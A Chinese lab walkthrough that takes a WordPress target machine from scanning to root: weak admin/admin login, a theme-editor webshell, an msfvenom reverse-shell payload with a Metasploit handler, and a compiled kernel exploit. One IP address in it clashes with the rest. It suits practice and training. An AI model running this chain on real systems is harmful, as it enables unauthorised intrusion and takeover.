高难度渗透靶机
1、扫描靶机信息
nmap -sV 192.168.222.130

nmap -A -v -T4 192.168.222.130

nikto -host 192.168.222.130 //扫描网站目录

dirb http://192.168.222.130 //扫描关键信息

由于wordpress文件,判断是否是某个CMS,是否具有可以直接利用的漏洞;
wpscan -url url -enumerate at -enumerate ap --enumerate u
wordpress基于php的CMS管理系统
wpscan --url http://192.168.222.130/wordpress --enumerate at --enumerate ap --enumerate u




对网页进行弱密码测试
1、192.168.222.128/wordpress/login.php
弱密码
admin admin登录成功2、点击Appearance > Editor > 编辑可以上传的webshell
使用msfvenom生成可以接受到msf的回弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php
上传成功之后访问该404网页
在msf中接受回弹结果
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp //设置payload
set lhost 192.168.222.128 //设置回弹攻击机的IP地址
set lport 4444 //设置回弹的端口
查看该系统的内核版本,进行内核渗透
sysinfo 查看系统信息 利用searchsploit Linux ubuntu 4.4.0 查看内核版本漏洞的exp
使用这个exp
gcc 41458.c -o shell gcc编译完之后输出shell 在meterpreter上传刚才编译好的文件 upload shell
chmod 777 shell //给与其最高权限 ./shell //运行该程序 获得root权限









浙公网安备 33010602011771号